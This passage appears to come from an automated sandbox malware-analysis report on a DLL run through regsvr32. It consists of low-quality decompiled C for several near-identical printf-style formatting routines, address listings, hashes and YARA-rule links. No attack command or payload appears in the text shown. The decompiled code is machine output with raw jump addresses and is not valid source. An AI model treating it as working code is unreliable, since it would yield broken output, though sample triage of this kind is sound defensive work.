				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000010;
				r8d = 0;
				E00000001180023DC8(0xa, __rcx, _t186, _t191);
				goto 0x8001f140;
				if (E000000011800219F8(_t118, _t161, __rcx, __rcx, _t178, __rbp, _t186) != 0) goto 0x8001f14b;
				goto 0x8001f290;
				if ( *((char*)(__rcx + 0x40)) != 0) goto 0x8001f28d;
				_t113 =  *(__rcx + 0x30);
				_a8 = 0;
				_a10 = 0;
				if ((r15b & 0) == 0) goto 0x8001f19d;
				if ((r15b & 0) == 0) goto 0x8001f180;
				_a8 = 0x2d;
				goto 0x8001f19a;
				if ((r15b & _t113) == 0) goto 0x8001f18c;
				_a8 = 0x2b;
				goto 0x8001f19a;
				if ((r15b & 0) == 0) goto 0x8001f19d;
				_a8 = 0x20;
				_t175 = _t193;
				_t105 =  *((intOrPtr*)(__rcx + 0x41));
				if (0 != 0) goto 0x8001f1b6;
				if ((r15b & 0) == 0) goto 0x8001f1b6;
				r8b = r15b;
				goto 0x8001f1b9;
				r8b = 0;
				if (r8b != 0) goto 0x8001f1ca;
				if (0 == 0) goto 0x8001f1f4;
				 *((char*)(_t184 + _t175 + 0x50)) = 0x30;
				if (_t105 == 0x58) goto 0x8001f1e0;
				if (_t105 == 0x41) goto 0x8001f1e0;
				goto 0x8001f1e3;
				asm("sbb al, al");
				 *((char*)(_t184 + _t175 + _t193 + 0x50)) = ( ~r15b & 0x000000e0) + 0x78;
				_t122 =  *((intOrPtr*)(__rcx + 0x34)) -  *((intOrPtr*)(__rcx + 0x50));
				if ((_t113 & 0x0000000c) != 0) goto 0x8001f216;
				r8d = _t122;
				E00000001180017780(( ~r15b & 0x000000e0) + 0x78, 0x20, __rcx, __rcx + 0x468, __rcx + 0x28);
				_t181 = __rcx + 0x28;
				_v40 =  *((intOrPtr*)(__rcx + 0x10));
				r8d = 0;
				E00000001180028A60(_t122, _t123, __rcx, __rcx + 0x468, _t175 + _t193 + _t193, _t178, _t181, _t181);
				_t106 =  *(__rcx + 0x30);
				if ((r15b & _t106 >> 0x00000003) == 0) goto 0x8001f262;
				if ((r15b & _t106 >> 0x00000002) != 0) goto 0x8001f262;
				r8d = _t122;
				E00000001180017780(_t106 >> 3, 0x30, __rcx, __rcx + 0x468, _t181);
				E00000001180028040(__rcx, __rcx, _t178);
				if ( *_t181 < 0) goto 0x8001f28d;
				if ((r15b &  *(__rcx + 0x30) >> 0x00000002) == 0) goto 0x8001f28d;
				r8d = _t122;
				E00000001180017780( *(__rcx + 0x30) >> 2, 0x20, __rcx, __rcx + 0x468, _t181);
				return r15b;
			}
























                                                                                                    0x18001f030
                                                                                                    0x18001f030
                                                                                                    0x18001f030
                                                                                                    0x18001f035
                                                                                                    0x18001f03a
                                                                                                    0x18001f044
                                                                                                    0x18001f048
                                                                                                    0x18001f04f
                                                                                                    0x18001f055
                                                                                                    0x18001f058
                                                                                                    0x18001f05a
                                                                                                    0x18001f063
                                                                                                    0x18001f06c
                                                                                                    0x18001f071
                                                                                                    0x18001f07a
                                                                                                    0x18001f083
                                                                                                    0x18001f088
                                                                                                    0x18001f08d
                                                                                                    0x18001f092
                                                                                                    0x18001f09b
                                                                                                    0x18001f0a3
                                                                                                    0x18001f0a8
                                                                                                    0x18001f0ad
                                                                                                    0x18001f0b2
                                                                                                    0x18001f0ba
                                                                                                    0x18001f0bf
                                                                                                    0x18001f0c4
                                                                                                    0x18001f0c9
                                                                                                    0x18001f0ce
                                                                                                    0x18001f0d3
                                                                                                    0x18001f0d8
                                                                                                    0x18001f0dd
                                                                                                    0x18001f0e2
                                                                                                    0x18001f0e4
                                                                                                    0x18001f0e9
                                                                                                    0x18001f0eb
                                                                                                    0x18001f0f2
                                                                                                    0x18001f0f9
                                                                                                    0x18001f101
                                                                                                    0x18001f103
                                                                                                    0x18001f10e
                                                                                                    0x18001f110
                                                                                                    0x18001f114
                                                                                                    0x18001f11f
                                                                                                    0x18001f121
                                                                                                    0x18001f126
                                                                                                    0x18001f128
                                                                                                    0x18001f131
                                                                                                    0x18001f134
                                                                                                    0x18001f139
                                                                                                    0x18001f142
                                                                                                    0x18001f146
                                                                                                    0x18001f14f
                                                                                                    0x18001f155
                                                                                                    0x18001f15a
                                                                                                    0x18001f161
                                                                                                    0x18001f16d
                                                                                                    0x18001f177
                                                                                                    0x18001f179
                                                                                                    0x18001f17e
                                                                                                    0x18001f183
                                                                                                    0x18001f185
                                                                                                    0x18001f18a
                                                                                                    0x18001f193
                                                                                                    0x18001f195
                                                                                                    0x18001f19a
                                                                                                    0x18001f19d
                                                                                                    0x18001f1a5
                                                                                                    0x18001f1af
                                                                                                    0x18001f1b1
                                                                                                    0x18001f1b4
                                                                                                    0x18001f1b6
                                                                                                    0x18001f1c4
                                                                                                    0x18001f1c8
                                                                                                    0x18001f1ca
                                                                                                    0x18001f1d5
                                                                                                    0x18001f1da
                                                                                                    0x18001f1de
                                                                                                    0x18001f1e5
                                                                                                    0x18001f1ed
                                                                                                    0x18001f1fa
                                                                                                    0x18001f1ff
                                                                                                    0x18001f205
                                                                                                    0x18001f211
                                                                                                    0x18001f21a
                                                                                                    0x18001f225
                                                                                                    0x18001f235
                                                                                                    0x18001f238
                                                                                                    0x18001f23d
                                                                                                    0x18001f248
                                                                                                    0x18001f250
                                                                                                    0x18001f255
                                                                                                    0x18001f25d
                                                                                                    0x18001f267
                                                                                                    0x18001f270
                                                                                                    0x18001f27b
                                                                                                    0x18001f280
                                                                                                    0x18001f288
                                                                                                    0x18001f2a8

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 3215553584-4108050209
                                                                                                    • Opcode ID: cf0b63e26c55d517d3162a7948029bb574ab2eed78c1fd9225de516ae105a9aa
                                                                                                    • Instruction ID: 58ba9c67472551012ff49201acc7d2e1f64a891b0178dd4dde4a1406b3434ebe
                                                                                                    • Opcode Fuzzy Hash: cf0b63e26c55d517d3162a7948029bb574ab2eed78c1fd9225de516ae105a9aa
                                                                                                    • Instruction Fuzzy Hash: 5671F636204A4896FBFB8A25C0507FE27A1A34D7D8F28C516FE44877DACF25CA4E8741
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001F53C Relevance: 1.4, Strings: 1, Instructions: 199COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 63%
                                                                                                    			E0000000118001F53C(void* __rax, long long __rbx, long long __rcx, long long __rsi, long long __rbp, char _a8, char _a10, long long _a16, long long _a24, long long _a32) {
				long long _v40;
				void* __rdi;
				char _t66;
				void* _t68;
				unsigned int _t104;
				intOrPtr _t105;
				unsigned int _t106;
				signed char _t113;
				void* _t118;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t161;
				void* _t173;
				void* _t175;
				intOrPtr* _t181;
				void* _t183;
				void* _t184;
				void* _t186;
				void* _t191;
				void* _t193;

				_t178 = __rsi;
				_t161 = __rax;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t184 = _t183 - 0x30;
				_t66 =  *((char*)(__rcx + 0x41));
				r15d = 1;
				_t124 = _t66 - 0x64;
				if (_t124 > 0) goto 0x8001f5c3;
				if (_t124 == 0) goto 0x8001f634;
				if (_t66 == 0x41) goto 0x8001f647;
				if (_t66 == 0x43) goto 0x8001f5ad;
				if (_t66 - 0x44 <= 0) goto 0x8001f650;
				if (_t66 - 0x47 <= 0) goto 0x8001f647;
				if (_t66 == 0x53) goto 0x8001f5f0;
				if (_t66 == 0x58) goto 0x8001f605;
				if (_t66 == 0x5a) goto 0x8001f5b9;
				if (_t66 == 0x61) goto 0x8001f647;
				if (_t66 != 0x63) goto 0x8001f650;
				E000000011800232D8(_t66 - 0x63, __rcx, __rcx);
				goto 0x8001f64c;
				_t68 = E00000001180020FB4(__rcx, __rcx, __rsi);
				goto 0x8001f64c;
				if (_t68 - 0x67 <= 0) goto 0x8001f647;
				if (_t68 == 0x69) goto 0x8001f634;
				if (_t68 == 0x6e) goto 0x8001f62d;
				if (_t68 == 0x6f) goto 0x8001f60f;
				if (_t68 == 0x70) goto 0x8001f5f7;
				if (_t68 == 0x73) goto 0x8001f5f0;
				if (_t68 == 0x75) goto 0x8001f638;
				if (_t68 != 0x78) goto 0x8001f650;
				goto 0x8001f63d;
				E00000001180025E24(__rcx, __rcx, _t178);
				goto 0x8001f64c;
				 *((intOrPtr*)(__rcx + 0x38)) = 0x10;
				 *((intOrPtr*)(__rcx + 0x3c)) = 0xb;
				r8b = r15b;
				goto 0x8001f640;
				_t104 =  *(__rcx + 0x30);
				if ((r15b & _t104 >> 0x00000005) == 0) goto 0x8001f623;
				asm("bts ecx, 0x7");
				 *(__rcx + 0x30) = _t104;
				goto 0x8001f63d;
				E00000001180025230(__rcx, __rcx, _t173, _t178);
				goto 0x8001f64c;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000010;
				r8d = 0;
				E0000000118002416C(0xa, __rcx, _t186, _t191);
				goto 0x8001f64c;
				if (E00000001180021E60(_t118, _t161, __rcx, __rcx, _t178, __rbp, _t186) != 0) goto 0x8001f657;
				goto 0x8001f79c;
				if ( *((char*)(__rcx + 0x40)) != 0) goto 0x8001f799;
				_t113 =  *(__rcx + 0x30);
				_a8 = 0;
				_a10 = 0;
				if ((r15b & 0) == 0) goto 0x8001f6a9;
				if ((r15b & 0) == 0) goto 0x8001f68c;
				_a8 = 0x2d;
				goto 0x8001f6a6;
				if ((r15b & _t113) == 0) goto 0x8001f698;
				_a8 = 0x2b;
				goto 0x8001f6a6;
				if ((r15b & 0) == 0) goto 0x8001f6a9;
				_a8 = 0x20;
				_t175 = _t193;
				_t105 =  *((intOrPtr*)(__rcx + 0x41));
				if (0 != 0) goto 0x8001f6c2;
				if ((r15b & 0) == 0) goto 0x8001f6c2;
				r8b = r15b;
				goto 0x8001f6c5;
				r8b = 0;
				if (r8b != 0) goto 0x8001f6d6;
				if (0 == 0) goto 0x8001f700;
				 *((char*)(_t184 + _t175 + 0x50)) = 0x30;
				if (_t105 == 0x58) goto 0x8001f6ec;
				if (_t105 == 0x41) goto 0x8001f6ec;
				goto 0x8001f6ef;
				asm("sbb al, al");
				 *((char*)(_t184 + _t175 + _t193 + 0x50)) = ( ~r15b & 0x000000e0) + 0x78;
				_t122 =  *((intOrPtr*)(__rcx + 0x34)) -  *((intOrPtr*)(__rcx + 0x50));
				if ((_t113 & 0x0000000c) != 0) goto 0x8001f722;
				r8d = _t122;
				E00000001180017780(( ~r15b & 0x000000e0) + 0x78, 0x20, __rcx, __rcx + 0x468, __rcx + 0x28);
				_t181 = __rcx + 0x28;
				_v40 =  *((intOrPtr*)(__rcx + 0x10));
				r8d = 0;
				E00000001180028A60(_t122, _t123, __rcx, __rcx + 0x468, _t175 + _t193 + _t193, _t178, _t181, _t181);
				_t106 =  *(__rcx + 0x30);
				if ((r15b & _t106 >> 0x00000003) == 0) goto 0x8001f76e;
				if ((r15b & _t106 >> 0x00000002) != 0) goto 0x8001f76e;
				r8d = _t122;
				E00000001180017780(_t106 >> 3, 0x30, __rcx, __rcx + 0x468, _t181);
				E000000011800281F0(__rcx, __rcx, _t178);
				if ( *_t181 < 0) goto 0x8001f799;
				if ((r15b &  *(__rcx + 0x30) >> 0x00000002) == 0) goto 0x8001f799;
				r8d = _t122;
				E00000001180017780( *(__rcx + 0x30) >> 2, 0x20, __rcx, __rcx + 0x468, _t181);
				return r15b;
			}
























                                                                                                    0x18001f53c
                                                                                                    0x18001f53c
                                                                                                    0x18001f53c
                                                                                                    0x18001f541
                                                                                                    0x18001f546
                                                                                                    0x18001f550
                                                                                                    0x18001f554
                                                                                                    0x18001f55b
                                                                                                    0x18001f561
                                                                                                    0x18001f564
                                                                                                    0x18001f566
                                                                                                    0x18001f56f
                                                                                                    0x18001f578
                                                                                                    0x18001f57d
                                                                                                    0x18001f586
                                                                                                    0x18001f58f
                                                                                                    0x18001f594
                                                                                                    0x18001f599
                                                                                                    0x18001f59e
                                                                                                    0x18001f5a7
                                                                                                    0x18001f5af
                                                                                                    0x18001f5b4
                                                                                                    0x18001f5b9
                                                                                                    0x18001f5be
                                                                                                    0x18001f5c6
                                                                                                    0x18001f5cb
                                                                                                    0x18001f5d0
                                                                                                    0x18001f5d5
                                                                                                    0x18001f5da
                                                                                                    0x18001f5df
                                                                                                    0x18001f5e4
                                                                                                    0x18001f5e9
                                                                                                    0x18001f5ee
                                                                                                    0x18001f5f0
                                                                                                    0x18001f5f5
                                                                                                    0x18001f5f7
                                                                                                    0x18001f5fe
                                                                                                    0x18001f605
                                                                                                    0x18001f60d
                                                                                                    0x18001f60f
                                                                                                    0x18001f61a
                                                                                                    0x18001f61c
                                                                                                    0x18001f620
                                                                                                    0x18001f62b
                                                                                                    0x18001f62d
                                                                                                    0x18001f632
                                                                                                    0x18001f634
                                                                                                    0x18001f63d
                                                                                                    0x18001f640
                                                                                                    0x18001f645
                                                                                                    0x18001f64e
                                                                                                    0x18001f652
                                                                                                    0x18001f65b
                                                                                                    0x18001f661
                                                                                                    0x18001f666
                                                                                                    0x18001f66d
                                                                                                    0x18001f679
                                                                                                    0x18001f683
                                                                                                    0x18001f685
                                                                                                    0x18001f68a
                                                                                                    0x18001f68f
                                                                                                    0x18001f691
                                                                                                    0x18001f696
                                                                                                    0x18001f69f
                                                                                                    0x18001f6a1
                                                                                                    0x18001f6a6
                                                                                                    0x18001f6a9
                                                                                                    0x18001f6b1
                                                                                                    0x18001f6bb
                                                                                                    0x18001f6bd
                                                                                                    0x18001f6c0
                                                                                                    0x18001f6c2
                                                                                                    0x18001f6d0
                                                                                                    0x18001f6d4
                                                                                                    0x18001f6d6
                                                                                                    0x18001f6e1
                                                                                                    0x18001f6e6
                                                                                                    0x18001f6ea
                                                                                                    0x18001f6f1
                                                                                                    0x18001f6f9
                                                                                                    0x18001f706
                                                                                                    0x18001f70b
                                                                                                    0x18001f711
                                                                                                    0x18001f71d
                                                                                                    0x18001f726
                                                                                                    0x18001f731
                                                                                                    0x18001f741
                                                                                                    0x18001f744
                                                                                                    0x18001f749
                                                                                                    0x18001f754
                                                                                                    0x18001f75c
                                                                                                    0x18001f761
                                                                                                    0x18001f769
                                                                                                    0x18001f773
                                                                                                    0x18001f77c
                                                                                                    0x18001f787
                                                                                                    0x18001f78c
                                                                                                    0x18001f794
                                                                                                    0x18001f7b4

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 3215553584-4108050209
                                                                                                    • Opcode ID: 4ef57a622da3dff6104a5adaf5ffe419afa7ab1de09e81135db79a3f0f717e70
                                                                                                    • Instruction ID: f69cb1f073e5280c9ee42ab1240446980914753ab323c6616bbcdda45a19484b
                                                                                                    • Opcode Fuzzy Hash: 4ef57a622da3dff6104a5adaf5ffe419afa7ab1de09e81135db79a3f0f717e70
                                                                                                    • Instruction Fuzzy Hash: 3171F676304E4C46FBFB8A2590403FE63A1A3497C8F248515FD459B7EACF25CA4E8B01
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001E8A8 Relevance: 1.4, Strings: 1, Instructions: 199COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 55%
                                                                                                    			E0000000118001E8A8(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __rbp, char _a8, char _a10, long long _a16, long long _a24, long long _a32) {
				long long _v40;
				void* __rdi;
				char _t66;
				void* _t68;
				unsigned int _t104;
				intOrPtr _t105;
				unsigned int _t106;
				signed char _t113;
				void* _t118;
				void* _t122;
				void* _t123;
				void* _t160;
				void* _t172;
				void* _t174;
				intOrPtr* _t180;
				void* _t182;
				void* _t183;
				void* _t185;
				void* _t190;
				void* _t192;

				_t177 = __rsi;
				_t172 = __rdx;
				_t160 = __rax;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t183 = _t182 - 0x30;
				_t66 =  *((char*)(__rcx + 0x41));
				r15d = 1;
				_t123 = _t66 - 0x64;
				if (_t123 > 0) goto 0x8001e92f;
				if (_t123 == 0) goto 0x8001e9a0;
				if (_t66 == 0x41) goto 0x8001e9b3;
				if (_t66 == 0x43) goto 0x8001e919;
				if (_t66 - 0x44 <= 0) goto 0x8001e9bc;
				if (_t66 - 0x47 <= 0) goto 0x8001e9b3;
				if (_t66 == 0x53) goto 0x8001e95c;
				if (_t66 == 0x58) goto 0x8001e971;
				if (_t66 == 0x5a) goto 0x8001e925;
				if (_t66 == 0x61) goto 0x8001e9b3;
				if (_t66 != 0x63) goto 0x8001e9bc;
				E00000001180022ECC(_t66 - 0x63, __rcx, __rcx);
				goto 0x8001e9b8;
				_t68 = E00000001180020CFC(__rcx, __rcx, __rsi);
				goto 0x8001e9b8;
				if (_t68 - 0x67 <= 0) goto 0x8001e9b3;
				if (_t68 == 0x69) goto 0x8001e9a0;
				if (_t68 == 0x6e) goto 0x8001e999;
				if (_t68 == 0x6f) goto 0x8001e97b;
				if (_t68 == 0x70) goto 0x8001e963;
				if (_t68 == 0x73) goto 0x8001e95c;
				if (_t68 == 0x75) goto 0x8001e9a4;
				if (_t68 != 0x78) goto 0x8001e9bc;
				goto 0x8001e9a9;
				E00000001180025B24(__rcx, __rcx, _t177);
				goto 0x8001e9b8;
				 *((intOrPtr*)(__rcx + 0x38)) = 0x10;
				 *((intOrPtr*)(__rcx + 0x3c)) = 0xb;
				r8b = r15b;
				goto 0x8001e9ac;
				_t104 =  *(__rcx + 0x30);
				if ((r15b & _t104 >> 0x00000005) == 0) goto 0x8001e98f;
				asm("bts ecx, 0x7");
				 *(__rcx + 0x30) = _t104;
				goto 0x8001e9a9;
				E00000001180024D94(__rcx, __rcx, _t172, _t177);
				goto 0x8001e9b8;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000010;
				r8d = 0;
				E00000001180023884(0xa, __rcx, _t185, _t190);
				goto 0x8001e9b8;
				if (E00000001180021374(_t118, _t160, __rcx, __rcx, _t177, __rbp, _t185) != 0) goto 0x8001e9c3;
				goto 0x8001eb08;
				if ( *((char*)(__rcx + 0x40)) != 0) goto 0x8001eb05;
				_t113 =  *(__rcx + 0x30);
				_a8 = 0;
				_a10 = 0;
				if ((r15b & 0) == 0) goto 0x8001ea15;
				if ((r15b & 0) == 0) goto 0x8001e9f8;
				_a8 = 0x2d;
				goto 0x8001ea12;
				if ((r15b & _t113) == 0) goto 0x8001ea04;
				_a8 = 0x2b;
				goto 0x8001ea12;
				if ((r15b & 0) == 0) goto 0x8001ea15;
				_a8 = 0x20;
				_t174 = _t192;
				_t105 =  *((intOrPtr*)(__rcx + 0x41));
				if (0 != 0) goto 0x8001ea2e;
				if ((r15b & 0) == 0) goto 0x8001ea2e;
				r8b = r15b;
				goto 0x8001ea31;
				r8b = 0;
				if (r8b != 0) goto 0x8001ea42;
				if (0 == 0) goto 0x8001ea6c;
				 *((char*)(_t183 + _t174 + 0x50)) = 0x30;
				if (_t105 == 0x58) goto 0x8001ea58;
				if (_t105 == 0x41) goto 0x8001ea58;
				goto 0x8001ea5b;
				asm("sbb al, al");
				 *((char*)(_t183 + _t174 + _t192 + 0x50)) = ( ~r15b & 0x000000e0) + 0x78;
				_t122 =  *((intOrPtr*)(__rcx + 0x34)) -  *((intOrPtr*)(__rcx + 0x50));
				if ((_t113 & 0x0000000c) != 0) goto 0x8001ea8e;
				r8d = _t122;
				E0000000118001766C(0x20, __rcx, __rcx + 0x468, _t174 + _t192 + _t192, _t177, __rbp, __rcx + 0x28);
				_t180 = __rcx + 0x28;
				_v40 =  *((intOrPtr*)(__rcx + 0x10));
				r8d = 0;
				E0000000118002885C(__rcx, __rcx + 0x468,  &_a8, _t177, _t180, _t180);
				_t106 =  *(__rcx + 0x30);
				if ((r15b & _t106 >> 0x00000003) == 0) goto 0x8001eada;
				if ((r15b & _t106 >> 0x00000002) != 0) goto 0x8001eada;
				r8d = _t122;
				E0000000118001766C(0x30, __rcx, __rcx + 0x468, _t174 + _t192 + _t192, _t177, _t180, _t180);
				E00000001180027DB8(__rcx, __rcx, _t177);
				if ( *_t180 < 0) goto 0x8001eb05;
				if ((r15b &  *(__rcx + 0x30) >> 0x00000002) == 0) goto 0x8001eb05;
				r8d = _t122;
				E0000000118001766C(0x20, __rcx, __rcx + 0x468, _t174 + _t192 + _t192, _t177, _t180, _t180);
				return r15b;
			}























                                                                                                    0x18001e8a8
                                                                                                    0x18001e8a8
                                                                                                    0x18001e8a8
                                                                                                    0x18001e8a8
                                                                                                    0x18001e8ad
                                                                                                    0x18001e8b2
                                                                                                    0x18001e8bc
                                                                                                    0x18001e8c0
                                                                                                    0x18001e8c7
                                                                                                    0x18001e8cd
                                                                                                    0x18001e8d0
                                                                                                    0x18001e8d2
                                                                                                    0x18001e8db
                                                                                                    0x18001e8e4
                                                                                                    0x18001e8e9
                                                                                                    0x18001e8f2
                                                                                                    0x18001e8fb
                                                                                                    0x18001e900
                                                                                                    0x18001e905
                                                                                                    0x18001e90a
                                                                                                    0x18001e913
                                                                                                    0x18001e91b
                                                                                                    0x18001e920
                                                                                                    0x18001e925
                                                                                                    0x18001e92a
                                                                                                    0x18001e932
                                                                                                    0x18001e937
                                                                                                    0x18001e93c
                                                                                                    0x18001e941
                                                                                                    0x18001e946
                                                                                                    0x18001e94b
                                                                                                    0x18001e950
                                                                                                    0x18001e955
                                                                                                    0x18001e95a
                                                                                                    0x18001e95c
                                                                                                    0x18001e961
                                                                                                    0x18001e963
                                                                                                    0x18001e96a
                                                                                                    0x18001e971
                                                                                                    0x18001e979
                                                                                                    0x18001e97b
                                                                                                    0x18001e986
                                                                                                    0x18001e988
                                                                                                    0x18001e98c
                                                                                                    0x18001e997
                                                                                                    0x18001e999
                                                                                                    0x18001e99e
                                                                                                    0x18001e9a0
                                                                                                    0x18001e9a9
                                                                                                    0x18001e9ac
                                                                                                    0x18001e9b1
                                                                                                    0x18001e9ba
                                                                                                    0x18001e9be
                                                                                                    0x18001e9c7
                                                                                                    0x18001e9cd
                                                                                                    0x18001e9d2
                                                                                                    0x18001e9d9
                                                                                                    0x18001e9e5
                                                                                                    0x18001e9ef
                                                                                                    0x18001e9f1
                                                                                                    0x18001e9f6
                                                                                                    0x18001e9fb
                                                                                                    0x18001e9fd
                                                                                                    0x18001ea02
                                                                                                    0x18001ea0b
                                                                                                    0x18001ea0d
                                                                                                    0x18001ea12
                                                                                                    0x18001ea15
                                                                                                    0x18001ea1d
                                                                                                    0x18001ea27
                                                                                                    0x18001ea29
                                                                                                    0x18001ea2c
                                                                                                    0x18001ea2e
                                                                                                    0x18001ea3c
                                                                                                    0x18001ea40
                                                                                                    0x18001ea42
                                                                                                    0x18001ea4d
                                                                                                    0x18001ea52
                                                                                                    0x18001ea56
                                                                                                    0x18001ea5d
                                                                                                    0x18001ea65
                                                                                                    0x18001ea72
                                                                                                    0x18001ea77
                                                                                                    0x18001ea7d
                                                                                                    0x18001ea89
                                                                                                    0x18001ea92
                                                                                                    0x18001ea9d
                                                                                                    0x18001eaad
                                                                                                    0x18001eab0
                                                                                                    0x18001eab5
                                                                                                    0x18001eac0
                                                                                                    0x18001eac8
                                                                                                    0x18001eacd
                                                                                                    0x18001ead5
                                                                                                    0x18001eadf
                                                                                                    0x18001eae8
                                                                                                    0x18001eaf3
                                                                                                    0x18001eaf8
                                                                                                    0x18001eb00
                                                                                                    0x18001eb20

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 3215553584-4108050209
                                                                                                    • Opcode ID: 150c5dcab27a0215af51c80ab9351d724e9c0091d056e22f03e1df63dc6eb25e
                                                                                                    • Instruction ID: 1841d3488bc1fa19bceb182966e459ea0f92cdfe4a8e70a141a9e9bb76291115
                                                                                                    • Opcode Fuzzy Hash: 150c5dcab27a0215af51c80ab9351d724e9c0091d056e22f03e1df63dc6eb25e
                                                                                                    • Instruction Fuzzy Hash: 7A711631204AC846FBFB8A1950807EE6390AB4F7C4F589517FD419B7DACE25DA4E8702
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001EDB4 Relevance: 1.4, Strings: 1, Instructions: 199COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 55%
                                                                                                    			E0000000118001EDB4(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __rbp, char _a8, char _a10, long long _a16, long long _a24, long long _a32) {
				long long _v40;
				void* __rdi;
				char _t66;
				void* _t68;
				unsigned int _t104;
				intOrPtr _t105;
				unsigned int _t106;
				signed char _t113;
				void* _t118;
				void* _t122;
				void* _t123;
				void* _t160;
				void* _t172;
				void* _t174;
				intOrPtr* _t180;
				void* _t182;
				void* _t183;
				void* _t185;
				void* _t190;
				void* _t192;

				_t177 = __rsi;
				_t172 = __rdx;
				_t160 = __rax;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t183 = _t182 - 0x30;
				_t66 =  *((char*)(__rcx + 0x41));
				r15d = 1;
				_t123 = _t66 - 0x64;
				if (_t123 > 0) goto 0x8001ee3b;
				if (_t123 == 0) goto 0x8001eeac;
				if (_t66 == 0x41) goto 0x8001eebf;
				if (_t66 == 0x43) goto 0x8001ee25;
				if (_t66 - 0x44 <= 0) goto 0x8001eec8;
				if (_t66 - 0x47 <= 0) goto 0x8001eebf;
				if (_t66 == 0x53) goto 0x8001ee68;
				if (_t66 == 0x58) goto 0x8001ee7d;
				if (_t66 == 0x5a) goto 0x8001ee31;
				if (_t66 == 0x61) goto 0x8001eebf;
				if (_t66 != 0x63) goto 0x8001eec8;
				E00000001180023078(_t66 - 0x63, __rcx, __rcx);
				goto 0x8001eec4;
				_t68 = E00000001180020E18(__rcx, __rcx, __rsi);
				goto 0x8001eec4;
				if (_t68 - 0x67 <= 0) goto 0x8001eebf;
				if (_t68 == 0x69) goto 0x8001eeac;
				if (_t68 == 0x6e) goto 0x8001eea5;
				if (_t68 == 0x6f) goto 0x8001ee87;
				if (_t68 == 0x70) goto 0x8001ee6f;
				if (_t68 == 0x73) goto 0x8001ee68;
				if (_t68 == 0x75) goto 0x8001eeb0;
				if (_t68 != 0x78) goto 0x8001eec8;
				goto 0x8001eeb5;
				E00000001180025C5C(__rcx, __rcx, _t177);
				goto 0x8001eec4;
				 *((intOrPtr*)(__rcx + 0x38)) = 0x10;
				 *((intOrPtr*)(__rcx + 0x3c)) = 0xb;
				r8b = r15b;
				goto 0x8001eeb8;
				_t104 =  *(__rcx + 0x30);
				if ((r15b & _t104 >> 0x00000005) == 0) goto 0x8001ee9b;
				asm("bts ecx, 0x7");
				 *(__rcx + 0x30) = _t104;
				goto 0x8001eeb5;
				E00000001180024F74(__rcx, __rcx, _t172, _t177);
				goto 0x8001eec4;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000010;
				r8d = 0;
				E00000001180023C28(0xa, __rcx, _t185, _t190);
				goto 0x8001eec4;
				if (E000000011800217DC(_t118, _t160, __rcx, __rcx, _t177, __rbp, _t185) != 0) goto 0x8001eecf;
				goto 0x8001f014;
				if ( *((char*)(__rcx + 0x40)) != 0) goto 0x8001f011;
